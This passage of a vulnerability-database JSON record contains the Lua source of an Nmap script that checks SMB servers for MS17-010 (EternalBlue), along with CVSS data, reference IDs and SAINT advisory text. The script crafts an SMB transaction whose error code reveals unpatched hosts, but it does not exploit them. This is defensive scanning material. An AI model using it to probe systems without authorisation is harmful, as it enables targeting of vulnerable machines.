SMBv1 server is vulnerable to a remote code\n execution vulnerability (ms17-010, a.k.a. EternalBlue).\n The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.\n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and\n checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to\n determine if the target is not patched against ms17-010. Additionally it checks\n for known error codes returned by patched systems.\n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.\n\nReferences:\n* https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n* https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n* https://msdn.microsoft.com/en-us/library/ee441489.aspx\n* https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n* https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n]]\n\n---\n-- @usage nmap -p445 --script smb-vuln-ms17-010 <target>\n-- @usage nmap -p445 --script vuln <target>\n--\n-- @see smb-double-pulsar-backdoor.nse\n--\n-- @output\n-- Host script results:\n-- | smb-vuln-ms17-010:\n-- | VULNERABLE:\n-- | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2017-0143\n-- | Risk factor: HIGH\n-- | A critical remote code execution vulnerability exists in Microsoft SMBv1\n-- | servers (ms17-010).\n-- |\n-- | Disclosure date: 2017-03-14\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n-- | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n-- |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n--\n-- @xmloutput\n-- <table key=\"CVE-2017-0143\">\n-- <elem key=\"title\">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"ids\">\n-- <elem>CVE:CVE-2017-0143</elem>\n-- </table>\n-- <table key=\"description\">\n-- <elem>A critical remote code execution vulnerability exists in Microsoft SMBv1&#xa; servers (ms17-010).&#xa;</elem>\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"month\">03</elem>\n-- <elem key=\"year\">2017</elem>\n-- <elem key=\"day\">14</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">2017-03-14</elem>\n-- <table key=\"refs\">\n-- <elem>https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</elem>\n-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143</elem>\n-- <elem>https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/</elem>\n-- </table>\n-- </table>\n--\n-- @args smb-vuln-ms17-010.sharename Share name to connect. Default: IPC$\n---\n\nauthor = \"Paulino Calderon <paulino()calderonpale.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\nlocal function check_ms17010(host, port, sharename)\n local status, smbstate = smb.start_ex(host, true, true, \"\\\\\\\\\".. host.ip .. \"\\\\\" .. sharename, nil, nil, nil)\n if not status then\n stdnse.debug1(\"Could not connect to '%s'\", sharename)\n return false, string.format(\"Could not connect to '%s'\", sharename)\n else\n local overrides = {}\n local smb_header, smb_params, smb_cmd\n\n stdnse.debug1(\"Connected to share '%s'\", sharename)\n\n overrides['parameters_length'] = 0x10\n\n --SMB_COM_TRANSACTION opcode is 0x25\n smb_header = smb.smb_encode_header(smbstate, 0x25, overrides)\n smb_params = string.pack(\">I2 I2 I2 I2 B B I2 I4 I2 I2 I2 I2 I2 B B I2 I2 I2 I2 I2 I2\",\n 0x0, -- Total Parameter count (2 bytes)\n 0x0, -- Total Data count (2 bytes)\n 0xFFFF, -- Max Parameter count (2 bytes)\n 0xFFFF, -- Max Data count (2 bytes)\n 0x0, -- Max setup Count (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x0, -- Flags (2 bytes)\n 0x0, -- Timeout (4 bytes)\n 0x0, -- Reserved (2 bytes)\n 0x0, -- ParameterCount (2 bytes)\n 0x4a00, -- ParameterOffset (2 bytes)\n 0x0, -- DataCount (2 bytes)\n 0x4a00, -- DataOffset (2 bytes)\n 0x02, -- SetupCount (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x2300, -- PeekNamedPipe opcode\n 0x0, --\n 0x0700, -- BCC (Length of \"\\PIPE\\\")\n 0x5c50, -- \\P\n 0x4950, -- IP\n 0x455c -- E\\\n )\n stdnse.debug2(\"SMB: Sending SMB_COM_TRANSACTION\")\n local result, err = smb.smb_send(smbstate, smb_header, smb_params, '', overrides)\n if(result == false) then\n stdnse.debug1(\"There was an error in the SMB_COM_TRANSACTION request\")\n return false, err\n end\n\n local result, smb_header, _, _ = smb.smb_read(smbstate)\n if not result then\n stdnse.debug1(\"Error reading SMB response: %s\", smb_header)\n -- error can happen if an (H)IPS resets the connection\n return false, smb_header\n end\n\n local _ , smb_cmd, err = string.unpack(\"<c4 B I4\", smb_header)\n if smb_cmd == 37 then -- SMB command for Trans is 0x25\n stdnse.debug1(\"Valid SMB_COM_TRANSACTION response received\")\n\n --STATUS_INSUFF_SERVER_RESOURCES indicate that the machine is not patched\n if err == 0xc0000205 then\n stdnse.debug1(\"STATUS_INSUFF_SERVER_RESOURCES response received\")\n return true\n elseif err == 0xc0000022 then\n stdnse.debug1(\"STATUS_ACCESS_DENIED response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n elseif err == 0xc0000008 then\n stdnse.debug1(\"STATUS_INVALID_HANDLE response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n end\n stdnse.debug1(\"Error code received:%s\", stdnse.tohex(err))\n else\n stdnse.debug1(\"Received invalid command id.\")\n return false, string.format(\"Unexpected SMB response:%s\", stdnse.tohex(err))\n end\n end\nend\n\naction = function(host,port)\n local vuln_status, err\n local vuln = {\n title = \"Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\",\n IDS = {CVE = 'CVE-2017-0143'},\n risk_factor = \"HIGH\",\n description = [[\nA critical remote code execution vulnerability exists in Microsoft SMBv1\n servers (ms17-010).\n ]],\n references = {\n 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx',\n 'https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/'\n },\n dates = {\n disclosure = {year = '2017', month = '03', day = '14'},\n }\n }\n local sharename = stdnse.get_script_args(SCRIPT_NAME .. \".sharename\") or \"IPC$\"\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n vuln.state = vulns.STATE.NOT_VULN\n\n vuln_status, err = check_ms17010(host, port, sharename)\n if vuln_status then\n stdnse.debug1(\"This host is missing the patch for ms17-010!\")\n vuln.state = vulns.STATE.VULN\n else\n vuln.state = vulns.STATE.NOT_VULN\n vuln.check_results = err\n end\n return report:make_output(vuln)\nend\n", "nmap": {"categories": ["safe", "vuln"], "scriptType": "hostrule"}, "scheme": null, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}}], "saint": [{"published": "2017-04-26T00:00:00", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2021-07-28T14:33:33", "rev": 2}, "score": {"value": 8.6, "vector": "NONE", "modified": "2021-07-28T14:33:33", "rev": 2}}, "id": "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "hash": "478250fdb6bc5e8d8bec8e3bfa109998e923f328069a0ee2f1adc0e75a13fb8c", "title": "Windows SMBv1 Remote Command Execution", "bulletinFamily": "exploit", "viewCount": 105, "edition": 4, "reporter": "SAINT Corporation", "references": [], "type": "saint", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "67164609e54a9c48368f8c8211098c3c"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "46cfe8ba7ece1f650e5f50e76a93bd99"}, {"key": "href", "hash": "daec4ba69103823e03c8f3c832c5b41d"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "9347e214aa74471d67b0cec25114c5c9"}, {"key": "published", "hash": "9347e214aa74471d67b0cec25114c5c9"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a2e6da74c8b179f121f93bda28c97a91"}, {"key": "title", "hash": "b3eb3e5939e1290e443adbd9dcd4d55f"}, {"key": "type", "hash": "2a4c1f6b0cd88cf3fac4b56bd4283522"}], "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on 64-bit versions of Windows 7 and Windows Server 2008 R2. \n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "edition": 1, "hash": "c49cac595db1843f9439e0e5718b1e49c95f07ecc6f1b0607777a951798f2fec", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b3eb3e5939e1290e443adbd9dcd4d55f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "published"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "daec4ba69103823e03c8f3c832c5b41d", "key": "href"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}, {"hash": "b585fb8d48395d7459f226680992c33c", "key": "description"}], "history": [], "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "id": "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "lastseen": "2017-04-29T21:21:12", "modified": "2017-04-26T00:00:00", "objectVersion": "1.2", "published": "2017-04-26T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Windows SMBv1 Remote Command Execution", "type": "saint", "viewCount": 2}, "differentElements": ["description"], "edition": 1, "lastseen": "2017-04-29T21:21:12"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on Windows 7 and Windows Server 2008 R2. \n\nIf the exploit succeeds against a 32-bit target, the target reboots when the command connection is closed. \n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-05-29T19:19:31", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46"], "type": "saint"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-05-29T19:19:31", "rev": 2, "value": 8.6, "vector": "NONE"}}, "hash": "a4e78b0a3861133458e4174696ad202977a2c3a25b13f1b0d786e745ae9e120f", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "b3eb3e5939e1290e443adbd9dcd4d55f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "published"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "daec4ba69103823e03c8f3c832c5b41d", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "46cfe8ba7ece1f650e5f50e76a93bd99", "key": "description"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}], "history": [], "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "id": "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "immutableFields": [], "lastseen": "2019-05-29T19:19:31", "modified": "2017-04-26T00:00:00", "objectVersion": "1.5", "published": "2017-04-26T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Windows SMBv1 Remote Command Execution", "type": "saint", "viewCount": 89}, "different_elements": ["cvss3", "cvss2"], "edition": 3, "lastseen": "2019-05-29T19:19:31"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on Windows 7 and Windows Server 2008 R2. \n\nIf the exploit succeeds against a 32-bit target, the target reboots when the command connection is closed. \n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "edition": 2, "enchantments": {"dependencies": {"modified": "2017-05-07T05:21:42", "references": [{"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46"], "type": "saint"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "606bbb8b84c472ff4ef07b651f67db0f7541b59202328912105aa47211e7b859", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b3eb3e5939e1290e443adbd9dcd4d55f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "published"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "daec4ba69103823e03c8f3c832c5b41d", "key": "href"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "46cfe8ba7ece1f650e5f50e76a93bd99", "key": "description"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}], "history": [], "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "id": "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "lastseen": "2017-05-07T05:21:42", "modified": "2017-04-26T00:00:00", "objectVersion": "1.2", "published": "2017-04-26T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Windows SMBv1 Remote Command Execution", "type": "saint", "viewCount": 42}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-05-07T05:21:42"}], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. 